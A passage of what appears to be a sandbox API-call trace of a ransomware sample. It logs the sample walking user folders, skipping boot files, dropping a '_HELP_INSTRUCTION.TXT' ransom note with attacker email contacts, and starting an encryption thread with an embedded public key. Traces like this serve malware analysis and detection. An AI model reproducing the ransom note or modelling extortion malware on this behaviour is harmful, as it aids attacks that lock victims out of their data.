We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0140.563] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\searches\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.564] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\searches\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.565] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0140.566] PathFindFileNameW (pszPath="C:\\Users\\Default\\Searches") returned="Searches" [0140.566] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0140.566] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0140.566] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.566] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.566] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.566] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.566] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.566] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.566] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0140.566] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0140.567] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0140.567] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.567] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0140.567] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0140.567] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0140.567] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0140.567] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo" [0140.567] SetErrorMode (uMode=0x1) returned 0x1 [0140.568] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo" [0140.568] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\Default\\SendTo\\") returned="C:\\Users\\Default\\SendTo\\" [0140.568] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\SendTo\\" | out: lpString1="C:\\Users\\Default\\SendTo\\") returned="C:\\Users\\Default\\SendTo\\" [0140.568] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\SendTo\\*.*") returned="C:\\Users\\Default\\SendTo\\*.*" [0140.568] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0140.568] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0140.568] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo" [0140.568] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\SendTo\\*.*") returned="C:\\Users\\Default\\SendTo\\*.*" [0140.568] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="Desktop") returned 0x0 [0140.568] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="DESKTOP") returned 0x0 [0140.568] SetErrorMode (uMode=0x1) returned 0x1 [0140.568] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\SendTo\\_HELP_INSTRUCTION.TXT") returned 45 [0140.568] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0140.568] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0140.568] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x818) returned 0x0 [0140.569] RegQueryValueExW (in: hKey=0x818, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d03348, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d03348*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0140.569] RegCloseKey (hKey=0x818) returned 0x0 [0140.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0140.569] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0140.569] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\sendto\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.571] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\sendto\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.573] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0140.573] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0140.573] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.573] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0140.574] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0140.574] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0140.574] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0140.574] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu" [0140.574] SetErrorMode (uMode=0x1) returned 0x1 [0140.574] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu" [0140.574] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Start Menu\\") returned="C:\\Users\\Default\\Start Menu\\" [0140.574] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Start Menu\\" | out: lpString1="C:\\Users\\Default\\Start Menu\\") returned="C:\\Users\\Default\\Start Menu\\" [0140.574] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Start Menu\\*.*") returned="C:\\Users\\Default\\Start Menu\\*.*" [0140.574] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0140.574] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0140.574] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu" [0140.574] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Start Menu\\*.*") returned="C:\\Users\\Default\\Start Menu\\*.*" [0140.574] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="Desktop") returned 0x0 [0140.574] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="DESKTOP") returned 0x0 [0140.574] SetErrorMode (uMode=0x1) returned 0x1 [0140.574] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Start Menu\\_HELP_INSTRUCTION.TXT") returned 49 [0140.574] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0140.574] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0140.574] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x818) returned 0x0 [0140.574] RegQueryValueExW (in: hKey=0x818, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d03578, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d03578*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0140.574] RegCloseKey (hKey=0x818) returned 0x0 [0140.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0140.574] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0140.574] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\start menu\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.575] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\start menu\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.575] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0140.575] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0140.575] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.575] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0140.575] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0140.575] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0140.575] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0140.575] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates" [0140.575] SetErrorMode (uMode=0x1) returned 0x1 [0140.575] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates" [0140.575] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Templates\\") returned="C:\\Users\\Default\\Templates\\" [0140.575] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Templates\\" | out: lpString1="C:\\Users\\Default\\Templates\\") returned="C:\\Users\\Default\\Templates\\" [0140.575] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Templates\\*.*") returned="C:\\Users\\Default\\Templates\\*.*" [0140.575] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0140.575] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0140.575] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates" [0140.575] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Templates\\*.*") returned="C:\\Users\\Default\\Templates\\*.*" [0140.575] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="Desktop") returned 0x0 [0140.575] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="DESKTOP") returned 0x0 [0140.575] SetErrorMode (uMode=0x1) returned 0x1 [0140.575] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Templates\\_HELP_INSTRUCTION.TXT") returned 48 [0140.575] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0140.575] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0140.575] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x818) returned 0x0 [0140.576] RegQueryValueExW (in: hKey=0x818, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d037a8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d037a8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0140.576] RegCloseKey (hKey=0x818) returned 0x0 [0140.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0140.576] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0140.576] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\templates\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.576] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\templates\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.576] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0140.576] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0140.576] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.576] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0140.576] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0140.576] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0140.576] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0140.576] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0140.576] SetErrorMode (uMode=0x1) returned 0x1 [0140.576] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0140.576] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\" [0140.576] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Videos\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\" [0140.576] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Videos\\*.*") returned="C:\\Users\\Default\\Videos\\*.*" [0140.576] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0140.576] PathFindFileNameW (pszPath="C:\\Users\\Default\\Videos") returned="Videos" [0140.576] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0140.576] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.576] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.576] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0140.576] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0140.576] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0140.576] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0140.576] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0140.576] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0140.576] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0140.577] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="Desktop") returned 0x0 [0140.577] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0140.577] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Videos\\") returned 28 [0140.577] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.577] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0140.577] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos\\") returned="\\\\?\\C:\\Users\\Default\\Videos\\" [0140.577] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x81c [0140.577] Sleep (dwMilliseconds=0x96) [0140.733] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0140.733] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0140.733] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0140.733] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0140.733] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Videos\\*.*") returned="C:\\Users\\Default\\Videos\\*.*" [0140.733] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="Desktop") returned 0x0 [0140.733] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0140.733] SetErrorMode (uMode=0x1) returned 0x1 [0140.734] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Videos\\_HELP_INSTRUCTION.TXT") returned 45 [0140.734] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0140.734] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0140.734] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x820) returned 0x0 [0140.734] RegQueryValueExW (in: hKey=0x820, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d039d8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d039d8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0140.734] RegCloseKey (hKey=0x820) returned 0x0 [0140.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0140.734] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0140.734] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.734] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\_HELP_INSTRUCTION.TXT" 